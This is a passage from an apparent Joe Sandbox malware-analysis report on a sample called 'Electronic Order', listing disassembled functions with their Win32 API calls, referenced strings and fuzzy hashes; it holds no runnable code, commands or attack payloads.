                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: State$Async$Keyboard
                                      • String ID:
                                      • API String ID: 541375521-0
                                      • Opcode ID: 58951b7e044831b79b90d5b7fcc3ec3ea288fc9032c76d12a216be01556145ca
                                      • Instruction ID: 05796e8c1d397c144bde1dee415995eea8c7739f8b30f0e9dcc87548e4f5e411
                                      • Opcode Fuzzy Hash: 58951b7e044831b79b90d5b7fcc3ec3ea288fc9032c76d12a216be01556145ca
                                      • Instruction Fuzzy Hash: 63512C30A047A819FB35EBB0A4547EABFF49F11384F08559AC5C2765C3DA649B8CCF61
                                      Function 00E1C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,00000001), ref: 00E1C746
                                      • GetWindowRect.USER32(00000000,?), ref: 00E1C758
                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00E1C7B6
                                      • GetDlgItem.USER32(?,00000002), ref: 00E1C7C1
                                      • GetWindowRect.USER32(00000000,?), ref: 00E1C7D3
                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00E1C827
                                      • GetDlgItem.USER32(?,000003E9), ref: 00E1C835
                                      • GetWindowRect.USER32(00000000,?), ref: 00E1C846
                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00E1C889
                                      • GetDlgItem.USER32(?,000003EA), ref: 00E1C897
                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E1C8B4
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00E1C8C1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$ItemMoveRect$Invalidate
                                      • String ID:
                                      • API String ID: 3096461208-0
                                      • Opcode ID: 1ced92245293d37b24b994100113b1e574ec90df011eb57d351b7cb57027edb4
                                      • Instruction ID: 5db6ad371d7c4db9145aa00cc00534d370a57742dc26f32aeac4973ac83d8371
                                      • Opcode Fuzzy Hash: 1ced92245293d37b24b994100113b1e574ec90df011eb57d351b7cb57027edb4
                                      • Instruction Fuzzy Hash: BD517075B00205AFDB08CF69DD89AAEBBB6EB89710F14812DF515E7290D770AD44CB50
                                      Function 00DC201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00DC2036,?,00000000,?,?,?,?,00DC16CB,00000000,?), ref: 00DC1B9A
                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00DC20D3
                                      • KillTimer.USER32(-00000001,?,?,?,?,00DC16CB,00000000,?,?,00DC1AE2,?,?), ref: 00DC216E
                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00DFBEF6
                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00DC16CB,00000000,?,?,00DC1AE2,?,?), ref: 00DFBF27
                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00DC16CB,00000000,?,?,00DC1AE2,?,?), ref: 00DFBF3E
                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00DC16CB,00000000,?,?,00DC1AE2,?,?), ref: 00DFBF5A
                                      • DeleteObject.GDI32(00000000), ref: 00DFBF6C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                      • String ID:
                                      • API String ID: 641708696-0
                                      • Opcode ID: 7443283d7baff8e59435e2e0d081be9b2eeba874b98264155e855dc067811dab
                                      • Instruction ID: 32f13e3657276a15b3eed0d03a35b3e4b1d71127d3506db639148c96803fafca
                                      • Opcode Fuzzy Hash: 7443283d7baff8e59435e2e0d081be9b2eeba874b98264155e855dc067811dab
                                      • Instruction Fuzzy Hash: 25617A34500616DFCB299F15DD48B39B7F1FF41322F18842EE18A67960C776A895EFA0
                                      Function 00DC21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC25DB: GetWindowLongW.USER32(?,000000EB), ref: 00DC25EC
                                      • GetSysColor.USER32(0000000F), ref: 00DC21D3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ColorLongWindow
                                      • String ID:
                                      • API String ID: 259745315-0
                                      • Opcode ID: eeb37af4496280b30a200e323727cd32a85ebc64fd02b611135fa64d04ea7fd3
                                      • Instruction ID: 030931566f228210f7552dd32e28147900f92ab031fcd388af769745d14f3916
                                      • Opcode Fuzzy Hash: eeb37af4496280b30a200e323727cd32a85ebc64fd02b611135fa64d04ea7fd3
                                      • Instruction Fuzzy Hash: 2541CF35000245AFDB219F28DC88FB97B65EB06731F184269FE659B2E2C7318C42DB35
                                      Function 00E2AB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharLowerBuffW.USER32(?,?,00E4F910), ref: 00E2AB76
                                      • GetDriveTypeW.KERNEL32(00000061,00E7A620,00000061), ref: 00E2AC40
                                      • _wcscpy.LIBCMT ref: 00E2AC6A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: BuffCharDriveLowerType_wcscpy
                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                      • API String ID: 2820617543-1000479233
                                      • Opcode ID: 0adc7d2617591614594c67fbcb29373e125754594faad2128bcb4900b096fd10
                                      • Instruction ID: b2c34860f882af3d30e3ae3b2041c59b3efc46013b4392fc0852f5ed749f70d9
                                      • Opcode Fuzzy Hash: 0adc7d2617591614594c67fbcb29373e125754594faad2128bcb4900b096fd10
                                      • Instruction Fuzzy Hash: C851A0301083529FC714EF14D892EAEB7A5EF80714F18582DF496A72A2DB71DD49CB63
                                      Function 00E4C27C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC2612: GetWindowLongW.USER32(?,000000EB), ref: 00DC2623
                                        • Part of subcall function 00DC2344: GetCursorPos.USER32(?), ref: 00DC2357
                                        • Part of subcall function 00DC2344: ScreenToClient.USER32(00E867B0,?), ref: 00DC2374
                                        • Part of subcall function 00DC2344: GetAsyncKeyState.USER32(00000001), ref: 00DC2399
                                        • Part of subcall function 00DC2344: GetAsyncKeyState.USER32(00000002), ref: 00DC23A7
                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00E4C2E4
                                      • ImageList_EndDrag.COMCTL32 ref: 00E4C2EA
                                      • ReleaseCapture.USER32 ref: 00E4C2F0
                                      • SetWindowTextW.USER32(?,00000000), ref: 00E4C39A
                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00E4C3AD
                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00E4C48F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID$pr$pr
                                      • API String ID: 1924731296-488423084
                                      • Opcode ID: 0cffd1665fc2c9991048e4c47c25c5e421f3b6dcbe266df6ec8cfb16a0b538b4
                                      • Instruction ID: 0f62c5d8dbde1b073f83e3205227c1aa742b07fae4d32fe6cb0abde9c89657b7
                                      • Opcode Fuzzy Hash: 0cffd1665fc2c9991048e4c47c25c5e421f3b6dcbe266df6ec8cfb16a0b538b4
                                      • Instruction Fuzzy Hash: B851BB74204301AFD704EF21D896F6A7BE1EF88714F10852DF599AB2E1CB70A948CB62
                                      Function 00DC9997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: __i64tow__itow__swprintf
                                      • String ID: %.15g$0x%p$False$True
                                      • API String ID: 421087845-2263619337
                                      • Opcode ID: 4b6c95ffbb6c0645278e9ff3d107b3a330972993af7b7aa5973821e89114d1d8
                                      • Instruction ID: 28df43ea7b0e3cad2cedf010ef6c792094d633988dd61ed51c515f63663f0c9f
                                      • Opcode Fuzzy Hash: 4b6c95ffbb6c0645278e9ff3d107b3a330972993af7b7aa5973821e89114d1d8
                                      • Instruction Fuzzy Hash: AF41B57160420AAADB24AB35D846F7AB7E8EF45300F24846EE689D7291EE71D941CF31
                                      Function 00E473C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00E473D9
                                      • CreateMenu.USER32 ref: 00E473F4
                                      • SetMenu.USER32(?,00000000), ref: 00E47403
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E47490
                                      • IsMenu.USER32(?), ref: 00E474A6
                                      • CreatePopupMenu.USER32 ref: 00E474B0
                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E474DD
                                      • DrawMenuBar.USER32 ref: 00E474E5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                      • String ID: 0$F
                                      • API String ID: 176399719-3044882817
                                      • Opcode ID: 5f54432dad1394430be08bb98fd45421b1d8d232f6824b57aeda194b54124316
                                      • Instruction ID: 93a53197d91210b2f3b47ad9480d8008f21f40dfdb12c7d33881a19e50e5a9e3
                                      • Opcode Fuzzy Hash: 5f54432dad1394430be08bb98fd45421b1d8d232f6824b57aeda194b54124316
                                      • Instruction Fuzzy Hash: 4B415A78A00205EFDB10DF65E844EAABBF5FF49305F144029E959B7350D735AD14CBA0
                                      Function 00E4772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00E477CD
                                      • CreateCompatibleDC.GDI32(00000000), ref: 00E477D4
                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00E477E7
                                      • SelectObject.GDI32(00000000,00000000), ref: 00E477EF
                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E477FA
                                      • DeleteDC.GDI32(00000000), ref: 00E47803
                                      • GetWindowLongW.USER32(?,000000EC), ref: 00E4780D
                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00E47821
                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00E4782D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                      • String ID: static
                                      • API String ID: 2559357485-2160076837
                                      • Opcode ID: 7de898756c30d695dc626237ac9c3b8ae7a38b455c2fa5c37e38db4020cad467
                                      • Instruction ID: cf1af90808e945b8ab6b1f845cb6d3c0277657d9129f8c972eb79d984e5cafa6
                                      • Opcode Fuzzy Hash: 7de898756c30d695dc626237ac9c3b8ae7a38b455c2fa5c37e38db4020cad467
                                      • Instruction Fuzzy Hash: 6A31AA36101215AFDF119FA5EC08FDA3B69EF0E725F110225FA55B60A0C731D826DBA0
                                      Function 00DE7040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00DE707B
                                        • Part of subcall function 00DE8D68: __getptd_noexit.LIBCMT ref: 00DE8D68
                                      • __gmtime64_s.LIBCMT ref: 00DE7114
                                      • __gmtime64_s.LIBCMT ref: 00DE714A
                                      • __gmtime64_s.LIBCMT ref: 00DE7167
                                      • __allrem.LIBCMT ref: 00DE71BD
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DE71D9
                                      • __allrem.LIBCMT ref: 00DE71F0
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DE720E
                                      • __allrem.LIBCMT ref: 00DE7225
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DE7243
                                      • __invoke_watson.LIBCMT ref: 00DE72B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                      • String ID:
                                      • API String ID: 384356119-0
                                      • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                      • Instruction ID: dd04f5fc0f126df7dca2295590aa031b35da4e929d4369efd1ca897a67aa3cb5
                                      • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                      • Instruction Fuzzy Hash: FA71F871A04757ABD754BE7ACC42B6AB3B8FF10320F15822AF614E7681E770E94087B4
                                      Function 00E22A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00E22A31
                                      • GetMenuItemInfoW.USER32(00E86890,000000FF,00000000,00000030), ref: 00E22A92
                                      • SetMenuItemInfoW.USER32(00E86890,00000004,00000000,00000030), ref: 00E22AC8
                                      • Sleep.KERNEL32(000001F4), ref: 00E22ADA
                                      • GetMenuItemCount.USER32(?), ref: 00E22B1E
                                      • GetMenuItemID.USER32(?,00000000), ref: 00E22B3A
                                      • GetMenuItemID.USER32(?,-00000001), ref: 00E22B64
                                      • GetMenuItemID.USER32(?,?), ref: 00E22BA9
                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E22BEF
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E22C03
                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E22C24
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                      • String ID:
                                      • API String ID: 4176008265-0
                                      • Opcode ID: 477be848895ea2cb25704c7ba6041a421a78c2393c3930b16715821cce0e0ad7
                                      • Instruction ID: 011d5f3bc2a42354e74ebac56de31034ca235a235c5eea8aa6449e05ee9b910f
                                      • Opcode Fuzzy Hash: 477be848895ea2cb25704c7ba6041a421a78c2393c3930b16715821cce0e0ad7
                                      • Instruction Fuzzy Hash: 5061BFB0900259BFDB21CF64EC88EEEBBB8EB41308F14556DEA41B7251D731AD06DB20
                                      Function 00E47192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00E47214
                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00E47217
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00E4723B
                                      • _memset.LIBCMT ref: 00E4724C
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E4725E
                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00E472D6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend$LongWindow_memset
                                      • String ID:
                                      • API String ID: 830647256-0
                                      • Opcode ID: 2e1e44449717b312f46c6c63f2d75a860580d75e71490c1c136695e48f6f7c05
                                      • Instruction ID: 2e24f9e8118ae7d45446c173c99159ecfb64bd25f5a11fd2419d958e3a826cd6
                                      • Opcode Fuzzy Hash: 2e1e44449717b312f46c6c63f2d75a860580d75e71490c1c136695e48f6f7c05
                                      • Instruction Fuzzy Hash: 37616875A00208AFDB10DFA4DC81EEE77F8EB09714F144199FA58B72A1C771AA45DBA0
                                      Function 00E1710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E17135
                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00E1718E
                                      • VariantInit.OLEAUT32(?), ref: 00E171A0
                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00E171C0
                                      • VariantCopy.OLEAUT32(?,?), ref: 00E17213
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00E17227
                                      • VariantClear.OLEAUT32(?), ref: 00E1723C
                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00E17249
                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E17252
                                      • VariantClear.OLEAUT32(?), ref: 00E17264
                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E1726F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                      • String ID:
                                      • API String ID: 2706829360-0
                                      • Opcode ID: a9748bb90c40b051ee89351efb7b97a36a03de043cf4fcd3afbf49c5f412b224
                                      • Instruction ID: e7fe2bd7eba04471011f8cf6130439e000f1c80a8385b15cd5816fa68610eda8
                                      • Opcode Fuzzy Hash: a9748bb90c40b051ee89351efb7b97a36a03de043cf4fcd3afbf49c5f412b224
                                      • Instruction Fuzzy Hash: F6414075A04219AFCB04DF65D848DEEBBB8FF48754F008069F955B7261CB30A986CBA0
                                      Function 00E35A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WSAStartup.WSOCK32(00000101,?), ref: 00E35AA6
                                      • inet_addr.WSOCK32(?,?,?), ref: 00E35AEB
                                      • gethostbyname.WSOCK32(?), ref: 00E35AF7
                                      • IcmpCreateFile.IPHLPAPI ref: 00E35B05
                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00E35B75
                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00E35B8B
                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00E35C00
                                      • WSACleanup.WSOCK32 ref: 00E35C06
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                      • String ID: Ping
                                      • API String ID: 1028309954-2246546115
                                      • Opcode ID: 29913dd624dd68fc3515d514d364ce99b9e2a5b898b2938e703cf3e522c707dd
                                      • Instruction ID: 17f8ed18fe7c43c42d9ed49368d6e6e702b76ebb36cb969ab9dd5db4f15cb753
                                      • Opcode Fuzzy Hash: 29913dd624dd68fc3515d514d364ce99b9e2a5b898b2938e703cf3e522c707dd
                                      • Instruction Fuzzy Hash: 6951BE322047019FD710EF25DC49B6ABBE4EF48714F04992AF95AEB3A1DB70E844CB21
                                      Function 00E2B72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 00E2B73B
